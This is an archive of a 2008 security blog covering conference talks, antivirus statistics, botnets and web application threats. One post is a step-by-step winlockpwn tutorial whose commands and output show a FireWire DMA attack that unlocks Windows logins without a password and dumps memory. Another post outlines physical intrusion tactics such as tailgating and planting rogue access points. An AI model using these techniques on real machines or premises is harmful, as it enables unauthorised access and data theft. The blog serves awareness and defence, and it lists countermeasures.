Monday

Statistics from ecops.be



The Belgian newspaper "Het Belang van Limburg" reports on the statistics from www.ecops.be, the website of the Belgian Federal Computer Crime Unit.

This portal went online on 23 January 2007 and has been running for over a year now. Its main purpose is an electronic form for reporting computer crime and internet fraud.

During its first year, 12,000 complaints were registered. The registered complaints broke down as follows:

  • 50%: spam / unwanted email (lottery, medicine, watches, ...)
  • 20%: electronic transactions per SMS (deceptive advertising, forced sales, ...)
  • 17%: electronic transactions over the internet (deceptive offers, missing delivery, ...)
  • 10%: sales on auction sites (mostly missing deliveries)
Offenders first get a warning. In case of repeated complaints, a settlement is offered. In the worst cases, the dossier goes to court. No statistics are available on this.

Sunday

Presentations of Blackhat Europe 2008



The media archive for Blackhat Europe 2008 is now online. There were some very interesting talks. Too bad I couldn't make it. Here are some titles:

  • Spam-Evolution, by Aseem "@" Jakhar (Technical Lead, IBM Internet Security Systems)
  • Malware on the Net - Behind the Scenes, by Iftach Ian Amit (Director of Security Research, Finjan)
  • Bad Sushi - Beating Phishers at Their Own Game, by Nitesh Dhanjani (Senior Manager and Leader of Application Security Services, Ernst & Young LLP) and Billy Rios (Microsoft)
  • 0-Day Patch - Exposing Vendors (In)Security Performance, by Stefan Frei and Bernard Tellenbach (ETH Zurich, Communications Systems Group)
  • Developments in Cisco IOS Forensics, by Felix "FX" Lindner (Recurity Labs GmbH)
  • The Fundamentals of Physical Security, by Deviant Ollam (The Open Organization of Lockpickers)
  • Attacking Anti-Virus, by Feng Xue (a.k.a. Sowhat; Technical Lead, Nevis Labs)
I had a quick look through some of these. Attacking Anti-Virus was interesting but not that new (hack.lu). Last week, I was surprised that this vector is being used in attacks/pentesting. I'm wondering whether, even with a get-out-of-jail card (permission), this would be legal to perform in Belgium.

0-day Patch is a novel way to determine the security of an operating system. They don't just count the number of holes and how critical they are, but also determine what they call the zero-day patch rate. They used many independent sources, including Secunia, Milw0rm, the Open Source Vulnerability Database (OSVDB), the National Vulnerability Database (NVD) and CVE.
The end conclusion is that Apple is having a hard time keeping up with the vulnerabilities and the increased interest in their platform.
During the CanSecWest conference, fully patched Vista, Linux and Leopard machines were the targets in a hacking contest. During the first day, no 0-day exploits were allowed. During the second day, the rules were more relaxed and in just a few minutes the first to fall was the MacBook Air, due to a flaw in Safari. On the last day, the Vista laptop was also hacked, through a vulnerability in Adobe Flash.
So which one is the most secure? No one is perfect, and operating systems aren't any more secure than the idiot using them. Use your common sense.

Happy reading!!!

Bonus: you can also view the presentations from Source Boston 2008 on Blip.tv here.

Saturday

Partytricks: a winlockpwn tutorial or how to log into a computer without the password



Kudos to Michael Becher, Maximillian Dornseif and Christian N. Klein for their talk "0wn3d by an iPod" at PacSec 2004, and to Adam Boileau (aka "Metlstorm") for his presentation on physical attacks with FireWire at RUXCON 2006. His memory acquisition tools and Python libraries can be found here.

The whole discussion restarted some weeks ago when a cold boot attack was demonstrated, and soon after Boileau decided to release his winlockpwn tool. The following is a step-by-step tutorial on how to use his tool. This tutorial is for awareness and demonstration purposes only and is provided "AS IS" without support. If you need help, proceed to the BackTrack forums.

Get the Helix CD v1.9. Most of the tools needed are on this Linux LiveCD, except for winlockpwn, which you need to download. You can also do this on any installed Linux distribution that has FireWire support and Python, but then you need to add a kernel module (libraw1394) and compile some tools like romtool, which you can find in the package pythonraw1394-1.0.tar.gz (Python bindings for libraw1394, romtool for CSR trickery, and the 1394memimage forensics tool).

But let's take the easy road. Leave all FireWire cables unplugged, boot from the Helix LiveCD and open a root console.

I had some issues with the tool and this 'partytrick', and discovered on some websites that you need to make sure the sbp2 kernel module doesn't load. So locate "sbp2.ko" and remove or rename it.

Now, proceed to the location containing our tools and load the raw FireWire kernel module (these are two separate commands):

cd /usr/local/pythonraw1394
modprobe raw1394

Now the raw FireWire interface is available as /dev/raw1394. Use the ./businfo command to inspect all the devices that are hooked up to the FireWire bus. At this point you should only see your onboard FireWire port:
Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=1, busid=1023, localid=0, nodeCount=1, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0xd11a (Valid)
Bus ID : "1394"
GUID : 0x000d9d719f85019e
Vendor : 0x00000d9d (Hewlett Packard)
So we see that the hardware gets detected properly. If you are not using the Helix CD, make sure you run "chmod 666 /dev/raw1394".
Before we get DMA access, we must spoof our FireWire device so that it looks like a storage device (here: an iPod, using the ipod.csr configuration ROM):
./romtool -s 0 ipod.csr
Init firwire, port 0
Updated 1024 byte ROM image from ipod.csr
Now businfo should give you different output, like this:
Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=1, busid=1023, localid=0, nodeCount=1, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0x7286 (Valid)
Bus ID : "1394"
GUID : 0x000a270002aa6ba7
Vendor : 0x00000a27 (Apple Computer, Inc.)
Good! Now you can proceed and connect the cable to your target computer. Running the businfo tool again should show you a new node on your FireWire port:
Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=4, busid=1023, localid=0, nodeCount=2, name='ohci1394')
Node(number=0, nodeid=0xffc0)
.....
Node(number=1, nodeid=0xffc1)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0xbf70 (Invalid (0xb728))
Bus ID : "1394"
GUID : 0xa557565900508b71
Vendor : 0x00a55756 ()
Link Speed : 2 (S400)
Max Record Size : 10 (2048 bytes)
Isochronous Capable : 1 (Yes)
Bus Master Capable : 1 (Yes)
Cycle Master Capable : 1 (Yes)
Cycle Master Clock Accuracy : 0 ppm
Isochronous Resource Manager Capable : 1 (Yes)
Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
0 (Immediate Value), 12 (Node Capabilities): 0x83c0
0 (Immediate Value), 28 (Unknown 28): 0x50f2
0 (Immediate Value), 29 (Unknown 29): 0x2
0 (Immediate Value), 30 (Unknown 30): 0x0
0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)
So make sure you know the FireWire port number and node number. Get the winlockpwn tool, make sure it has Unix line endings (run dos2unix on it) and run it without arguments to see its usage:
Winlockpwn v1.5 Metlstorm, 2k6.
Usage: winlockpwn port node target [start-end]
- Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers.
- Target should be one of the numbered targets listed below.
- You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff.
(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)

Available Targets:
1: WinXP SP2 Fast User Switching Unlock
2: WinXP SP2 Unlock
3: WinXP SP2 msv1_0.dll technique
4: WinXP SP2 utilman cmd spawn
What we want is the third option. What it actually does is patch the call that decides whether an account requires password authentication. This causes all accounts to no longer require a password, which covers both the login screen and the lock screen. So let's proceed:
./winlockpwn.txt 0 1 3
It will scan the memory on port 0, node 1 and patch the login DLL (method 3):
Pattern: 0x8BFF558BEC83EC50A1
Offset : [2343]
Patch : 0xB001
Offset : 165
Scanning Options:
Start : 0x8000000
Stop : 0xffffffff
Pagesz : 4096
Init firwire, port 0 node 1
Snarfin' memories...
Checking for signature on page at 0x3097f000 (796156kB) at 43462 kB/s... Found signature at 0x33104927
Setting up teh bomb... Donezor!
Verified evil: 0xb001
You may proceed with your nefarious plans
Elapsed time 16 seconds
Voilà!!!! Just try to log in with any password. I also tried it on the local administrator account of my laptop and it simply works!!! FireWire = pwned.

Now if you are a forensics investigator, you can also take a memory dump at this point. After the '1394memimage' command, give the FireWire port and node number and the location where you want to save the image (on an external storage device, of course):

./1394memimage 0 1 /media/sdd1/memory.bin -1024M
Make sure you don't exceed the total memory amount or the system might crash.

That was it, folks. Remember, even if you disable the onboard ports in the BIOS, just plugging a PC Card into the laptop is enough to circumvent that. I bought a 4-port 1394 PC Card (brand Hama) at the local Media Markt for 7€ and it didn't need any drivers. Plug & pwn.

BIOS passwords aren't a good idea anyway. On Boileau's site, I saw another tool, bioskbsnarf: the tool he used to steal his own BIOS password. It is Python code that parses and prints the BIOS real-mode keyboard interrupt buffer. Use it with /dev/mem or with a memory image acquired via FireWire.

Replacing BIOS chips, social engineering the vendor support helpdesk for a recovery procedure, etc. are just other ways to circumvent BIOS passwords.

Now how about other operating systems?

After my FireWire demo at the security conference, a lot of people came to ask me whether this also works against Linux. So I did some research. The first FireWire DMA-based hack was the 2002 FireStarter attack by Quinn "The Eskimo". Apple modified their drivers to disable device DMA by the time OS X 10.3 came out.

At some point, Linux made the same fixes, so they should also be safe (this is unconfirmed on both accounts). Microsoft was informed about this 2 years ago and up until now nothing was done. Microsoft does not view FireWire DMA as a security problem, since it is part of the IEEE-1394 specification. According to Boileau, this is the reason why Redmond is not considering a fix. By the way, it also works against Vista.

How about USB devices?

Unless there is a bug in the USB drivers (like a buffer overflow), it's not feasible using the plain USB protocol. The FireWire protocol, however, does include DMA (and that's the problem).

Cardbus cards are effectively PCI cards and can perform arbitrary bus transactions. This can probably be used to bypass OS security.

Well, another thing that comes to mind is AutoPlay!!! According to Microsoft's 10 Immutable Laws of Security:
Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore

What is the solution?

Well, there is no silver bullet. Just add as many layers of defense as we can:
  1. Disable AutoPlay
  2. Use hard disk encryption software WITH a pre-boot password
  3. Disable the Standby feature (considering the cold boot attack) and also Hibernate if you don't have a pre-boot password
  4. Disable unused ports and bootable USB devices in the BIOS and password-protect it (this can be circumvented, but let's annoy the attacker as long as we can)
  5. Glue the FireWire port shut (?)
  6. Disable all FireWire ports and PCMCIA slots in the Device Manager (although I read that PCMCIA devices are bus masters once connected, so there is very little the CPU (commanded by the operating system) can do to prevent rogue devices on these interfaces from accessing arbitrary memory addresses)
  7. Always secure your laptops physically with a cable lock (can also be circumvented)
  8. Shut down your PC if you leave it unattended
  9. Use a data classification system and inform users not to store VERY confidential information on portable systems (though some people will ignore this policy)
  10. If the previous point is not possible, separately encrypt those sensitive files with another tool.
  11. Pray that Microsoft will release an updated driver
  12. Feel free to suggest other methods yourself...
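As an added example (not part of the original post or of Boileau's tools), here is the Linux-side counterpart of points 4 and 6: a check that reports whether the FireWire kernel modules the tutorial relies on (raw1394, ohci1394, sbp2, plus the newer firewire_* stack) are loaded, and a modprobe blacklist that keeps them from loading. The blacklist file path is an assumption; as point 6 notes, a bus-mastering PC Card can still bypass what the OS does, so this is only one layer.

```shell
#!/bin/sh
# Added example, not from the original post. Both functions are pure (they take
# their input as arguments) so they can be exercised on saved lsmod output.

# Prints the FireWire/IEEE-1394 modules found in lsmod-style text ($1) and
# returns 0; returns 1 when none of them are loaded.
firewire_modules_loaded() {
    found=$(printf '%s\n' "$1" | awk '
        NR > 1 && $1 ~ /^(raw1394|ohci1394|sbp2|ieee1394|firewire_core|firewire_ohci|firewire_sbp2)$/ { print $1 }')
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 0
    fi
    return 1
}

# Writes a modprobe configuration to $1 that blocks the FireWire stack.
# "blacklist" only stops alias-based autoloading; the "install ... /bin/false"
# line also defeats an explicit "modprobe raw1394" as used in the tutorial.
write_firewire_blacklist() {
    {
        echo "# Block the FireWire/IEEE-1394 stack: bus devices get DMA access to RAM"
        for m in raw1394 ohci1394 sbp2 ieee1394 firewire_core firewire_ohci firewire_sbp2; do
            echo "blacklist $m"
            echo "install $m /bin/false"
        done
    } > "$1"
}

# Live usage on a real host (assumed paths):
#   firewire_modules_loaded "$(lsmod)" && echo "FireWire stack is loaded, unload it"
#   write_firewire_blacklist /etc/modprobe.d/blacklist-firewire.conf
```

Unloading already-loaded modules (rmmod) and rebuilding the initramfs is still needed before the blacklist is fully effective.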
Bottom line: there is no 100% secure solution. Just add enough layers of protection and hope that the attacker gives up. Having a second look at Microsoft's 10 Immutable Laws of Security shows us:
Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore
Against the cold boot attack and the resulting problem for whole hard disk encryption, there are no definite solutions. And more and more tools based on this attack are getting released:

DaisyDukes is a memory sniffer that resides on a USB device. A researcher can plug it into an unattended machine that is turned on but has been locked and reboot the machine off a compact operating system contained on the drive. Depending on the user's needs, it can be configured to capture the entire contents of a computer's memory, or sniff out only certain types of data - say a password to access the company network or unlock a user's private encryption key.

It turns out both Windows and Linux retain "boatloads and boatloads" of passwords in memory, said Sherri Davidoff, a security analyst with IntelGuardians, the penetration-testing firm that developed the tool. It's already been able to isolate passwords for Thunderbird, AOL Instant Messenger, GPG, SSH, Outlook, Putty and TrueCrypt, among others, and with additional research they believe they can find many more.

"The idea here is let's see if we can hit an office building, get in and out in 25 minutes or less and walk out with some interesting passwords," said Tom Liston, an IntelGuardians security consultant who along with Davidoff co-presented the tool at the CanSecWest security conference in Vancouver. (Source: TheRegister)


Friday

What is enterprise 2.0?




My fellow blogger Karim got inspired by the Enterprise 2.0 slideshare I posted and wrote a nice post about it: "Welcome to Enterprise 2.0, embrace it!". He provided a nice overview of what Enterprise 2.0 entails:

Enterprise 1.0                                     Enterprise 2.0
Hierarchy                                          Flat organization
Friction                                           Ease of organization flow
Bureaucracy                                        Agility
Inflexibility                                      Flexibility
IT-driven technology / Lack of user control        User-driven technology
Top down                                           Bottom up
Centralized                                        Distributed
Teams are in one building / one time zone          Teams are global
Silos and boundaries                               Fuzzy boundaries, open borders
Need to know                                       Transparency
Information systems are structured and dictated    Information systems are emergent
Taxonomies                                         Folksonomies
Overly complex                                     Simple
Closed / proprietary standards                     Open
Scheduled                                          On demand
Long time-to-market cycles                         Short time-to-market cycles

I also happened to stumble upon another blog: "cazh1: on Business, Information, and Technology". He has some experience with Enterprise 2.0, and if you are interested in the concept, check these posts out:

Presentations from infosecurity.be 2008 are available (UPDATED)



The other presentations from the seminars at infosecurity.be are available. I noticed a few are missing, but I will be updating the links as they are uploaded. Some have a really nice design, although several slides seemed a bit crowded to me. The mantra "less is more" should apply here. Here are some articles from presentationzen.com that might clarify what I mean.

So let's give you the links to those presentations. (UPDATE: fixed the links)

  • Howard Schmidt - The changing face of information security threats
  • Amanda Jobbins - Changing IT Landscape
  • Bruno de Vuyst - Software patents
  • Bruno de Vuyst - Software Patents (PDF)
  • Marc Vael - Security Convergence
  • Philip de Wolf - Crisis management within business continuity
  • Sebastien Deleersnyder - Web application Security
  • Suzanne Janse - Governance, Risk & Compliance
  • Tom van de Wiele - Anti-Forensics

Thursday

Apple, don't be evil



After months of deliberating, I have decided to buy my own laptop. Not just any laptop, but a Macbook Pro.
I never wanted to own a laptop because I'm a power user. I need the best performance for the buck, and performance-wise laptops were always behind compared to desktops. This has changed somewhat in the last years and prices have really dropped. Now that I go to security conferences, I felt the need to get my own laptop. The one from work, although fully encrypted, sometimes contains confidential information. But we have seen that hard disk encryption is not all that. Also, the possibility to deactivate the virus scanner on my company laptop was revoked and this has become a major pain in the b*tt.
Why would I want to do that, even temporarily? For example, McAfee classified the security tool 'winlockpwn', a Python script, as a virus (which is really stupid). They should have marked it as an unwanted program, like most hacker tools. During my last demo, I found this out the hard way: the script was deleted when I inserted my USB stick. So, with my own laptop, I have some more control over its usage and can install all the tools I want.

There are more reasons, like my newfound passion for making presentations, the itch to try out Keynote from Apple and the nice design of the MacBook (hello backlit keyboard). Also, watching all those keynote presentations by Steve Jobs got me a little brainwashed. But....

*sigh* *double sigh*

Why, oh why did they do the following? First, they forced Safari as an upgrade (even when it wasn't installed) through the Apple Software Update service (which everyone with QuickTime or iTunes has).
Then we saw two new vulnerabilities in Safari for Windows, including the possibility to inject malicious code. And finally, it seems it's completely unstable and crashes on Windows XP.

All this for software most people didn't want to have? No wonder the Mozilla CEO called it a misuse of trust. It's hard enough for users to keep up to date with patches without misusing update services.

I'm really disappointed in Apple. I almost cancelled my order. Let's hope this was a one time mistake.

UPDATE: It even seems that the Apple EULA doesn't allow Safari to be installed on Windows.

Podcast: Blue Box #77: Skype security vulnerability, German gov't looks at trojans, undersea cable cuts, Microsoft and Yahoo, VoIP security news and m



Goodies, a new Blue box!!!

Welcome to Blue Box: The VoIP Security Podcast #76, a 36-minute podcast from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.

Synopsis: Blue Box #77: Skype security vulnerability, German gov't looks at trojans, undersea cable cuts, Microsoft and Yahoo, VoIP security news and more

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.

Why hacking changed and 90% of sites are still vulnerable



Let's start with the Hacker Webzine: "Why hacking changed" and "Why hacking changed, part 2". You really need to read those 2 marvelous pieces. An excerpt:

Today everything is software, even in the form of virtual hardware. The network today is no longer the main landscape for attack. Take the firewall for instance. Without the firewall, hacking was a walk in the park. Anyone with a dial-up modem could hack. Launch a telnet client and you had a very good chance that port 23 was open. Along came the firewall and now we have 99,99% of all ports blocked. Only port 80 and 25 are open if you are secure. So, most of the network is secure and does not pose an issue anymore. While the firewall is here, everyone in security fell asleep. We thought we were secure now right? the firewall and the IDS and other stuff is monitoring it right? Yes, that was the old view of security. That view is dead, and buried with the old school hackers because this isn't how the Internet operates today. What is happening now, is that the whole security of every server depends on the programmer that writes software. Software is the main culprit of almost all hacks today. If you can define hacking today, it no longer means telnetting into servers or blowing whistles, but exploiting the application layer. With the application layer, I also mean the scripting language beneath it, since it interacts with the applications that it's running and share memory, and thereby the hardware it's running on.
So the firewall and IDS are dead? (So might antivirus be, but let's not touch that hot potato today.) But the whole security of the server depends on the programmer who writes the software? Well, in that case, I have bad news for you!

After years of fighting the hacker wars, today's Websites are still a long way from being secure, according to a new research report. According to a report issued yesterday by WhiteHat Security, nine out of 10 Websites still have at least one vulnerability that attackers could exploit. On average, there are about seven flaws on each site studied. "While the security posture of some industries is better than others, the difference is largely insignificant when it comes to preventing a Website from becoming compromised -- attackers only need to exploit a single vulnerability," the report says. (Source: Darkreading)

So how to fix this? Here is an interesting article from techtarget.com: The essentials of Web application threat modeling. The highlights:

  1. Determine your security goals

  2. Document the general architecture of your application

  3. Outline what really needs to be protected

  4. Pinpoint the various entry points and "trust" zones

  5. Discover what can be exploited using a malicious mindset -- from both the perspective of an untrusted outsider and a trusted user.

    You'll never find or think of everything no matter how analytical your team is or how good your tools are. That's OK. Just go for the basics now. It doesn't take long to realise that the majority of Web application vulnerabilities are related to input validation, system configuration problems, and insiders abusing privileges they probably shouldn't have, including the following:

    • Cross-site scripting in search forms or message boards
    • SSL not being used or enforced throughout the application
    • Weak password requirements
    • Lack of account lockout after so many failed login attempts
    • Informative authentication errors being returned to the user, resulting in username and password harvesting
    • Weak mutual-factor authentication processes implemented per the Federal Financial Institutions Examination Council (FFIEC) requirements
    • Session keys and cookies not expiring or being easily manipulated
    • URL and/or form-field manipulation to bypass authentication or escalate privileges
    • Sensitive information returned in server errors that can give an attacker a leg up on penetrating the system

    Also, you may want to check out Microsoft's threat model called STRIDE that highlights the important areas of most applications:

    Spoofing identity
    Tampering with data
    Repudiation
    Information disclosure
    Denial of service
    Elevation of privilege

  6. Determine what's urgent and important

  7. Determine what can be done about each weakness

Read the full article for all the details. Also check out the OWASP Top 10 2007.

The OWASP Top Ten provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. There are currently versions in English, French, Japanese, Korean and Turkish. A Spanish version is in the works. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications do not contain these flaws. Adopting the OWASP Top Ten is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

Wednesday

Advice for home users



Yesterday, a teacher contacted me about my presentation at the security conference because she wanted to use it (or at least parts of it) in her class. Since a lot of the content is focused on corporations, I found it somewhat unsuitable without a major remake, although the part about drive-by downloads in the presentation is relevant for home users. So after some brainstorming, I decided to give some relevant links.

First of all, the SANS Cyber Security Awareness Month is a wealth of information on several topics. Also "Patching, Damned if you do, Damned if you don't" provides several tools to help you update your entire PC (not just windows update).

Then I found some very user-friendly guidelines from McAfee (note that I'm not sponsored by them). The documents on their site look really nice and could be useful. Let's start with the 10 step internet safety plan for your family (PDF).

There are several more documents over at the McAfee Security Advice Center.

UPDATE: Here is another resource: http://www.staysafeonline.org/ (Thank you Andy for the link)
And thanks to Brian for the following link: http://www.webwise.ie/

New version of Nessus and Nmap


Nmap 4.60 has been released. The changelog has more than 60 important changes since 4.50. This includes a new and shorter URL (nmap.org rather than insecure.org/nmap/), massive OS detection and version detection signature updates, many new Nmap Scripting Engine scripts, bug fixes, performance optimization, and more. It is available now from the download page.


And not only Nmap got an update: a few weeks ago Nessus got an upgrade too.

Tenable Security released the new version 3.2.0 of their Nessus vulnerability scanner about two weeks ago, and it's one tool no security pro should be without.

If you’re not familiar with Nessus by now, you’re either brand new to IT security or you’ve been living under a rock. I’d be willing to bet that three out of five security pros have used some form of Nessus, whether it was the freely downloadable version from Tenable or some version embedded in a security product. Heck, you may have even received an audit from a consulting firm that listed all your vulnerabilities in a ridiculously long report -- the simple output from a Nessus scan.

Nessus is a great, free, and very powerful tool for vulnerability scanning. It includes vulnerability and information plug-ins for thousands of services and operating systems, so initial usage can be a bit daunting for new users. And you should definitely test it in the lab -- some checks can have an adverse effect on network devices such as printers and power distribution units. I’ve seen printers and servers both go offline because the power distribution unit rebooted itself during a Nessus probe. (Source: Darkreading)

BONUS: httprecon is a tool for advanced web server fingerprinting.

The httprecon project is doing some research in the field of web server fingerprinting, also known as HTTP fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results, an implementation for automated analysis is also provided. This software shall improve the ease and efficiency of this kind of enumeration. Traditional approaches such as banner grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

2 new members in the Belgian Security Blognetwork



I'm happy to announce two new members of the Belgian Security Blognetwork (RSS feed): "Digital Forensics and more" and "/dev/random". Thank you, An and Xavier respectively, for joining us in the feed. I'm convinced you'll contribute interesting material.

"Digital Forensics and more" lists some interesting books and has a Google calendar with an overview of security events.

"/dev/random" keeps track of interesting *nix- and Belgium-related security topics. He provides some good practical tips.

Thank you guys (and girls) and keep up the good work!!! Subscribe to our RSS feed.

Welcome to security 2.0

Everything is increasing -- bis



In "Everything is increasing", I gave some statistics on antivirus detection rates. I just wanted to add this one from http://winnow.oitc.com/malewarestats.php. Read the previous article before you look at it.

When a piece of Malware is detected by the Malware Incident Reporting & Termination (MIRT) team, it is uploaded to VirusTotal for analysis. The performance of each antivirus engine is monitored by CastleCops. Once an hour, the system checks for updates. If there are some, the information on the performance of the 36 antivirus engines on all the detected malware is accumulated and statistics are updated for display by OITC.

The statistics provided here are an indication of the ability of the AntiVirus system's ability to deal with near 0-day infections. The performance by each antivirus system on early detections do not reflect the overall performance of an antivirus system. Consult with your IT department or computer security specialist for a more detailed analysis.

These performance statistics have been accumulated since Saturday, 2 December 2006, e.g. for the last 480 days. The most recent malware was detected and processed as of Tue Mar 25 18:27:07 2008 EDT.

AntiVirus Engine        Detection Rate
AVG                     26%
AhnLab-V3               7%
AntiVir                 66%
Authentium              15%
Avast                   20%
BitDefender             50%
CAT-QuickHeal           31%
ClamAV                  16%
DrWeb                   29%
Ewido                   28%
F-Prot                  15%
F-Prot4                 18%
F-Secure                43%
FileAdvisor             9%
Fortinet                56%
Ikarus                  53%
Kaspersky               46%
McAfee                  24%
Microsoft               20%
NOD32v2                 37%
Norman                  25%
Panda                   53%
Prevx1                  23%
Sophos                  29%
Sunbelt                 38%
Symantec                25%
TheHacker               9%
UNA                     10%
VBA32                   33%
VirusBuster             19%
Webwasher-Gateway       80%
eSafe                   50%
eTrust-InoculateIT      5%
eTrust-Vet              14%



Bear in mind, this is just one test, one statistic. Don't draw any rash conclusions from it. Anti-virus software is no substitute for common sense. AV software will not save you from infecting your PC if you ignore best practice: do not click on links or open attachments that arrive unexpectedly in e-mail or instant messages.

Tuesday

Don't make life difficult



Being a good storyteller can help you give a good presentation. Don't make life difficult: No Tech Hacking. I really enjoyed this video from Defcon. Give a show and use images, not bullet points!!! His book just jumped several places on my wishlist!! ;-)



If you made it through the entire presentation, here are some more low-tech tactics. Everyone knows the smokers' backdoor tactic? Go for a job interview. Tailgating. Once inside, plant a rogue access point.

Once inside, hardly anyone asks you what you are doing there. Not to mention that people are not used to questioning your authority if you politely explain to them that you are performing a security penetration test which aims to break into their networks. The truth is that humans can detect suspicious activities by following your body language. The more you lie, the more negative messages you are sending to the people around you and of course the higher the chance of getting caught. So being honest is actually a plus rather than a minus.

Even having access to a conference area is quite easy as you can arrange supposedly important meeting with someone from inside. Usually you find the network jacks underneath the table where you can connect whatever needs to be connected.

...

When we were once asked to break into some organizations, whose names we cannot disclose, we went exactly the opposite way of the expected. We researched the company and found all other companies they work with. Then we went onsite and discovered that some of these companies run open wifi networks for guests. It did not take us long to obtain access to sensitive mail, through leaked POP3 credentials which also got us a VPN access and other goodies.

(Source: The state of Wifi security -- Gnucitizen)

Sweet. Well, staying in the realms of Wifi (well, sort of), let's look at Evil twins.

Just like in WiFi security, Evil Twin attacks are all about impersonating someone or something. The reason why this scenario was mentioned was because we did have a go at it once (tiger teams do all sorts of cool and useful things). Then we found out that Paul and Larry also tried Evil Twin attacks against Twitchy and they all proved to be more than successful as we’ve promised in our blog post.

But is that all? Just Evil Twin attacks? Well NO! Definitely not! We are just at the beginning of a whole new brave world. For example, when I approach social networks I try to look at them from an Information Architecture point of view. I try to see the hidden connections between things and people and make my own conclusions depending on my goals. And the tools are quite different and I will definitely recommend a few and even release some of my own which were built to serve different purposes. (Source: Social networks, Evil twins and puppet masters -- Gnucitizen)
Read the entire post for some interesting information. Remember, don't make life difficult, think low or no tech hacking.

Everything is increasing



It's not only our food prices and gasoline prices that are rising, botnets and malware are also on the rise. In my presentation, I mentioned that this has become a well organized industry. But how well are they organized?





Brian Krebs did a piece on Antivirus firms struggling to keep up and the next picture tells it all:



The rapid increase of viruses and other malware has forced the anti-virus industry to overhaul its traditional approach writing its software, with the result that security products on the market today are far more powerful and sophisticated. But many observers say that despite all its new bells and whistles, the anti-virus industry as a whole continues to fall behind in identifying the very latest malicious software.

The challenge, security experts say, is that criminal groups responsible for manufacturing most of the malicious software in circulation today are reinvesting their illicit profits in research and recruiting talented computer programmers. A special emphasis is placed on creating malware that coexists peacefully with an infected computer system, doing its work quietly in the background.

"A lot of these [malware] shops are now hiring professionals and doing quality assurance work, things that generally make the job of the anti-virus researcher that much harder," said Randy Abrams, director of technical education at ESET, an anti-virus company based in Bratislava, Slovakia.

Quality assurance? Research and recruitment? Looking at the graph, we see that there was an exponential explosion by the end of 2006. It seems they are having more luck recruiting IT personnel than some of our companies do. Now, a 100% protection rate against malware is unrealistic, but a lot of people think that AV products give them 90%-95% detection rates. As you can read in the next part, this is not the case:

"The problem is that we have this ongoing, unrealistic expectation that somehow we are going to detect 100 percent of the malware out there, when in fact what we have today is slightly less detection than we did, say, in the mid-1990s, when we were actually catching 70 to 80 percent of the new threats," said AVIEN's Harley.

For security researchers on the bleeding edge of defending information networks, even those less-than-stellar numbers may seem a bit inflated. Jerry Dixon, director of analysis for Team Cymru, a security research firm in Burr Ridge, Ill., said his team recently submitted more than 1,000 samples of brand new malware for scanning by 32 different commercial anti-virus products from around the globe. The result: Only 37 percent of the programs were detected as malicious by any of the products.

"The real challenge here is for people to get it through their heads that anti-virus is not a panacea, and that it's always going to fall short of identifying threats in real-time," said Trend's Perry. "The challenge for us as an industry is to try to change that perception, while at the same time integrating new threat mitigation features into our products."

Read Full article.

I want to refer to two other papers. The first one was mentioned last month in The efficiency of anti-virus. There we could see the three virus scanners in the Google paper achieving detection rates ranging from 30% to 70%.
The second paper was from the German Honeynet Project, "Chinese Underground Economy", where they spidered the top sites displayed in google.cn. There they used 9 virus scanners to scan dropped binaries, and the best virus scanner out of the 9 had a detection rate of 83.6%. The other AV engines scored lower than that. These figures seem somewhat consistent with the numbers mentioned in the article above.

Now more specifically on the topic of botnets, I saw the following article from Zero Day Threat: Botnet saturation points to rising crime.

Our USA Today cover story today on botnets saturating the Internet revealed Support Intelligence’s astounding finding that, on any given day, 40% of the computers connected to the Internet are engaged in delivering spam, implanting malware, harvesting data, launching denial-of-service attacks and generally causing mayhem. On some days that rate spikes to 70%, says Support Intelligence CEO Rick Wesson.

That’s nightmarish.

IDC estimates roughly 800 million computers are connected to the Internet. A healthy Internet, says Wesson, would have less than 1%, or 8 million machines, botted. On an average day, Wesson sees more than 300 million bots engaging in nefarious activities.
Those figures seemed to be somewhat on the high side, or are they?

In 2007, some 25 percent of major Vietnamese websites were vulnerable to hackers' attacks, and 95 percent of personal computers were infected with viruses.

According to BKIS (a leading local network security center in Vietnam) surveys, last year, 342 Vietnamese websites were attacked by hackers, of which 224 websites were hacked by foreigners. Meanwhile, over 33.6 million computers were infected with viruses, causing estimated losses of 2.4 trillion Vietnamese dong (150 million U.S. dollars). (Source: people.com.cn)

So that's for Vietnam only. So 300 million bots may not seem completely impossible. I'm a bit interested to see some figures like these from European countries. I'm gonna finish with an article from Zdnet Asia: RSA sees increase in fast-flux botnets. In the article, researchers from Cambridge don't seem to reach the same conclusion and state that the number of botnets has remained stable during the last year. I'm not saying they are incorrect, but I'm going to show you the latest graph from shadowserver.org:




UPDATE: Added a small part 2: Everything is increasing -- bis

Monday

Random notes from Taosecurity


Ten Themes from Recent Conferences, Black Hat DC 2008 Wrap-Up and Thoughts from Several Conferences.

His ten themes describing the state of affairs:

  1. Permanent compromise is the norm, so accept it.
  2. We can not stop intruders, only raise their costs.
  3. Anyone of sufficient size and asset value is being targeted.
